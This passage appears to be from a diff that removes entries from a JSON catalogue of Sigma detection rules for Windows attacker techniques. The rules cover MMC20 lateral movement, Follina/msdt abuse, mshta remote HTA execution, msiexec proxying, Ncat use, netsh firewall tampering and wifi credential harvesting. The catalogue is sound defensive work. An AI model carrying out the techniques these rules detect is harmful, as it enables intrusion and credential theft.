Administrator using tool for password recovery" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", - "uuid": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", - "value": "MMC20 Lateral Movement", - "meta": { - "refs": [ - "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/", - 
"https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view?usp=sharing", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc20_lateral_movement.yml" - ], - "tags": [ - "attack.execution", - "attack.t1021.003" - ], - "creation_date": "2020/03/04", - "filename": "proc_creation_win_mmc20_lateral_movement.yml", - "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a Windows command line executable started from MMC", - "uuid": "05a2ab7e-ce11-4b63-86db-ab32e763e11d", - "value": "MMC Spawning Windows Shell", - "meta": { - "refs": [ - "https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc_spawn_shell.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.003" - ], - "creation_date": "2019/08/05", - "filename": "proc_creation_win_mmc_spawn_shell.yml", - "author": "Karneades, Swisscom CSIRT", - "level": "high", - "falsepositive": "No established falsepositives", - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", - "uuid": "ada4b0c4-758b-46ac-9033-9004613a150d", - "value": "Modify Group Policy Settings", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_modify_group_policy_settings.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1484.001" - ], - "creation_date": 
"2022/08/19", - "filename": "proc_creation_win_modify_group_policy_settings.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification of an existing service on a compromised host in order to execute an arbitrary payload when the service is started or killed as a method of persistence.", - "uuid": "38879043-7e1e-47a9-8d46-6bec88e201df", - "value": "Modification Of Existing Services For Persistence", - "meta": { - "refs": [ - "https://pentestlab.blog/2020/01/22/persistence-modify-existing-service/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_modif_of_services_for_via_commandline.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1543.003", - "attack.t1574.011" - ], - "creation_date": "2020/09/29", - "filename": "proc_creation_win_modif_of_services_for_via_commandline.yml", - "author": "Sreeman", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. 
It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded", - "uuid": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", - "value": "Monitoring For Persistence Via BITS", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html", - "https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_monitoring_for_persistence_via_bits.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1197" - ], - "creation_date": "2020/10/29", - "filename": "proc_creation_win_monitoring_for_persistence_via_bits.yml", - "author": "Sreeman", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", - "uuid": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", - "value": "Mouse Lock Credential Gathering", - "meta": { - "refs": [ - "https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf", - "https://sourceforge.net/projects/mouselock/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mouse_lock.yml" - ], - "tags": [ - "attack.credential_access", - "attack.collection", - "attack.t1056.002" - ], - "creation_date": "2020/08/13", - "filename": "proc_creation_win_mouse_lock.yml", - "author": "Cian Heasley", - "level": "medium", - "falsepositive": [ - "Legitimate uses of Mouse Lock software" - ], - "logsource.category": "process_creation", 
- "logsource.product": "windows" - } - }, - { - "description": "Detects file execution using the msdeploy.exe lolbin", - "uuid": "646bc99f-6682-4b47-a73a-17b1b64c9d34", - "value": "Execute Files with Msdeploy.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/", - "https://twitter.com/pabraeken/status/995837734379032576", - "https://twitter.com/pabraeken/status/999090532839313408", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdeploy.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ], - "creation_date": "2020/10/18", - "filename": "proc_creation_win_msdeploy.yml", - "author": "Beyu Denis, oscd.community", - "level": "medium", - "falsepositive": [ - "System administrator Usage" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", - "uuid": "258fc8ce-8352-443a-9120-8a11e4857fa5", - "value": "Execute Arbitrary Commands Using MSDT.EXE", - "meta": { - "refs": [ - "https://twitter.com/nao_sec/status/1530196847679401984", - "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", - "https://twitter.com/_JohnHammond/status/1531672601067675648", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2022/05/29", - "filename": "proc_creation_win_msdt.yml", - "author": "Nasreddine Bencherchali (rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects diagcab leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in 
CVE-2022-30190", - "uuid": "6545ce61-a1bd-4119-b9be-fcbee42c0cf3", - "value": "Execute MSDT.EXE Using Diagcab File", - "meta": { - "refs": [ - "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab", - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0", - "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_diagcab.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2022/06/09", - "filename": "proc_creation_win_msdt_diagcab.yml", - "author": "GossiTheDog (rule), frack113 (sigma version)", - "level": "high", - "falsepositive": [ - "Legitimate usage of \".diagcab\" files" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", - "uuid": "dc4576d4-7467-424f-9eee-fd2b02855fe0", - "value": "MSDT.EXE Execution With Suspicious Cab Option", - "meta": { - "refs": [ - "https://twitter.com/nas_bench/status/1537896324837781506", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_cab_options.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2022/06/21", - "filename": "proc_creation_win_msdt_susp_cab_options.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate usage of \".diagcab\" files" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects msdt.exe executed by a suspicious parent as seen in 
CVE-2022-30190 / Follina exploitation", - "uuid": "7a74da6b-ea76-47db-92cc-874ad90df734", - "value": "MSDT Executed with Suspicious Parent", - "meta": { - "refs": [ - "https://twitter.com/nao_sec/status/1530196847679401984", - "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_susp_parent.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1218" - ], - "creation_date": "2022/06/01", - "filename": "proc_creation_win_msdt_susp_parent.yml", - "author": "Nextron Systems", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the suspicious minimized start of MsEdge browser, which can be used to download files from the Internet", - "uuid": "94771a71-ba41-4b6e-a757-b531372eaab6", - "value": "Suspicious Minimized MSEdge Start", - "meta": { - "refs": [ - "https://twitter.com/mrd0x/status/1478234484881436672?s=12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msedge_minimized_download.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2022/01/11", - "filename": "proc_creation_win_msedge_minimized_download.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", - "uuid": "b98d0db6-511d-45de-ad02-e82a98729620", - "value": "Mshta Remotely Hosted HTA File Execution", - "meta": { - "refs": [ - 
"https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_http.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.005" - ], - "creation_date": "2022/08/08", - "filename": "proc_creation_win_mshta_http.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Identifies suspicious mshta.exe commands.", - "uuid": "67f113fa-e23d-4271-befa-30113b3e08b1", - "value": "Mshta JavaScript Execution", - "meta": { - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.005" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_mshta_javascript.yml", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a Windows command line executable started from MSHTA", - "uuid": "03cc0c25-389f-4bf8-b48d-11878079f1ca", - "value": "MSHTA Spawning Windows Shell", - "meta": { - "refs": [ - "https://www.trustedsec.com/july-2015/malicious-htas/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_spawn_shell.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.005", - "car.2013-02-003", - "car.2013-03-001", - "car.2014-04-003" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_mshta_spawn_shell.yml", - "author": "Michael Haag", - "level": "high", - "falsepositive": [ - "Printer software / driver installations", - "HP software" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", - "uuid": "84f52741-8834-4a8c-a413-2eb2269aa6c8", - "value": "Suspicious Msiexec Load DLL", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", - "https://twitter.com/_st0pp3r_/status/1583914515996897281", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_dll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ], - "creation_date": "2022/04/24", - "filename": "proc_creation_win_msiexec_dll.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": 
"Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", - "uuid": "4a2a2c3e-209f-4d01-b513-4155a540b469", - "value": "Suspicious MsiExec Embedding Parent", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_embedding.yml" - ], - "tags": [ - "attack.t1218.007", - "attack.defense_evasion" - ], - "creation_date": "2022/04/16", - "filename": "proc_creation_win_msiexec_embedding.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", - "uuid": "6f4191bb-912b-48a8-9ce7-682769541e6d", - "value": "Suspicious Msiexec Execute Arbitrary DLL", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://twitter.com/_st0pp3r_/status/1583914515996897281", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ], - "creation_date": "2022/01/16", - "filename": "proc_creation_win_msiexec_execute_dll.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate script" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious 
payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", - "uuid": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", - "value": "Suspicious Msiexec Quiet Install", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://twitter.com/_st0pp3r_/status/1583914244344799235", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ], - "creation_date": "2022/01/16", - "filename": "proc_creation_win_msiexec_install_quiet.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate script" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", - "uuid": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", - "value": "Suspicious Msiexec Quiet Install From Remote Location", - "meta": { - "refs": [ - "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ], - "creation_date": "2022/10/28", - "filename": "proc_creation_win_msiexec_install_remote.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects process injection using Microsoft Remote Asssistance (Msra.exe) which has been 
used for discovery and persistence tactics", - "uuid": "744a188b-0415-4792-896f-11ddb0588dbc", - "value": "Msra.exe Process Injection", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/", - "https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msra_process_injection.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055" - ], - "creation_date": "2022/06/24", - "filename": "proc_creation_win_msra_process_injection.yml", - "author": "Alexander McDonald", - "level": "high", - "falsepositive": [ - "Legitimate use of Msra.exe" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", - "uuid": "954f0af7-62dd-418f-b3df-a84bc2c7a774", - "value": "Remote Desktop Protocol Use Mstsc", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.001" - ], - "creation_date": "2022/01/07", - "filename": "proc_creation_win_mstsc.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "WSL (Windows Sub System For Linux)", - "Other currently unknown software" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects multiple suspicious process in a limited timeframe", 
- "uuid": "61ab5496-748e-4818-a92f-de78e20fe7f1", - "value": "Quick Execution of a Series of Suspicious Commands", - "meta": { - "refs": [ - "https://car.mitre.org/wiki/CAR-2013-04-002", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_multiple_susp_cli.yml" - ], - "tags": [ - "car.2013-04-002", - "attack.execution", - "attack.t1059" - ], - "creation_date": "2019/01/16", - "filename": "proc_creation_win_multiple_susp_cli.yml", - "author": "juju4", - "level": "low", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", - "uuid": "e31033fc-33f0-4020-9a16-faf9b31cbf08", - "value": "Ncat Execution", - "meta": { - "refs": [ - "https://nmap.org/ncat/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netcat_execution.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1095" - ], - "creation_date": "2021/07/21", - "filename": "proc_creation_win_netcat_execution.yml", - "author": "frack113, Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate ncat use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects netsh commands that opens the port 3389 used for RDP, used in Sarwent Malware", - "uuid": "01aeb693-138d-49d2-9403-c4f52d7d3d62", - "value": "Netsh RDP Port Opening", - "meta": { - "refs": [ - "https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_allow_port_rdp.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.004"
- ],
- "creation_date": "2020/05/23",
- "filename": "proc_creation_win_netsh_allow_port_rdp.yml",
- "author": "Sander Wiebing",
- "level": "high",
- "falsepositive": [
- "Legitimate administration"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Allow Incoming Connections by Port or Application on Windows Firewall",
- "uuid": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c",
- "value": "Netsh Port or Application Allowed",
- "meta": {
- "refs": [
- "https://attack.mitre.org/software/S0246/ (Lazarus HARDRAIN)",
- "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.004"
- ],
- "creation_date": "2019/01/29",
- "filename": "proc_creation_win_netsh_fw_add.yml",
- "author": "Markus Neis, Sander Wiebing",
- "level": "medium",
- "falsepositive": [
- "Legitimate administration"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects Netsh commands that allows a suspcious application location on Windows Firewall",
- "uuid": "a35f5a72-f347-4e36-8895-9869b0d5fc6d",
- "value": "Netsh Program Allowed with Suspcious Location",
- "meta": {
- "refs": [
- "https://www.virusradar.com/en/Win32_Kasidet.AD/description",
- "https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_add_susp_image.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.004"
- ],
-
"creation_date": "2020/05/25",
- "filename": "proc_creation_win_netsh_fw_add_susp_image.yml",
- "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community",
- "level": "high",
- "falsepositive": [
- "Legitimate administration"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the removal of a port or application rule in the Windows Firewall configuration using netsh",
- "uuid": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2",
- "value": "Netsh Firewall Rule Deletion",
- "meta": {
- "refs": [
- "https://app.any.run/tasks/8bbd5b4c-b82d-4e6d-a3ea-d454594a37cc/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_delete.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.004"
- ],
- "creation_date": "2022/08/14",
- "filename": "proc_creation_win_netsh_fw_delete.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Legitimate administration"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage",
- "uuid": "347906f3-e207-4d18-ae5b-a9403d6bcdef",
- "value": "Netsh Allow Group Policy on Microsoft Defender Firewall",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall",
- "https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.004"
- ],
- "creation_date": "2022/01/09",
- "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml",
-
"author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Legitimate administration"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects capture a network trace via netsh.exe trace functionality",
- "uuid": "d3c3861d-c504-4c77-ba55-224ba82d0118",
- "value": "Capture a Network Trace with netsh.exe",
- "meta": {
- "refs": [
- "https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_packet_capture.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.credential_access",
- "attack.t1040"
- ],
- "creation_date": "2019/10/24",
- "filename": "proc_creation_win_netsh_packet_capture.yml",
- "author": "Kutepov Anton, oscd.community",
- "level": "medium",
- "falsepositive": [
- "Legitimate administrator or user uses netsh.exe trace functionality for legitimate reason"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects netsh commands that configure a port forwarding (PortProxy)",
- "uuid": "322ed9ec-fcab-4f67-9a34-e7c6aef43614",
- "value": "Netsh Port Forwarding",
- "meta": {
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html",
- "https://adepts.of0x.cc/netsh-portproxy-code/",
- "https://www.dfirnotes.net/portproxy_detection/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_fwd.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.defense_evasion",
- "attack.command_and_control",
- "attack.t1090"
- ],
- "creation_date": "2019/01/29",
- "filename": "proc_creation_win_netsh_port_fwd.yml",
- "author": "Florian Roth, omkar72, oscd.community",
- "level": "medium",
- "falsepositive": [
- "Legitimate
administration",
- "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects netsh commands that configure a port forwarding of port 3389 used for RDP",
- "uuid": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63",
- "value": "Netsh RDP Port Forwarding",
- "meta": {
- "refs": [
- "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_port_fwd_3389.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.defense_evasion",
- "attack.command_and_control",
- "attack.t1090"
- ],
- "creation_date": "2019/01/29",
- "filename": "proc_creation_win_netsh_port_fwd_3389.yml",
- "author": "Florian Roth, oscd.community",
- "level": "high",
- "falsepositive": [
- "Legitimate administration"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detect the harvesting of wifi credentials using netsh.exe",
- "uuid": "42b1a5b8-353f-4f10-b256-39de4467faff",
- "value": "Harvesting of Wifi Credentials Using netsh.exe",
- "meta": {
- "refs": [
- "https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.credential_access",
- "attack.t1040"
- ],
- "creation_date": "2020/04/20",
- "filename": "proc_creation_win_netsh_wifi_credential_harvesting.yml",
- "author": "Andreas Hunkeler (@Karneades), oscd.community",
- "level": "medium",
- "falsepositive": [
- "Legitimate administrator or user uses netsh.exe wlan functionality for legitimate reason"
- ],
-
"logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n",
- "uuid": "758ff488-18d5-4cbe-8ec4-02b6285a434f",
- "value": "Use of NetSupport Remote Access Software",
- "meta": {
- "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsupport.yml"
- ],
- "tags": [
- "attack.command_and_control",
- "attack.t1219"
- ],
- "creation_date": "2022/09/25",
- "filename": "proc_creation_win_netsupport.yml",
- "author": "frack113",
- "level": "medium",
- "falsepositive": [
- "Legitimate use"
- ],
- "logsource.category": "process_creation",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system",
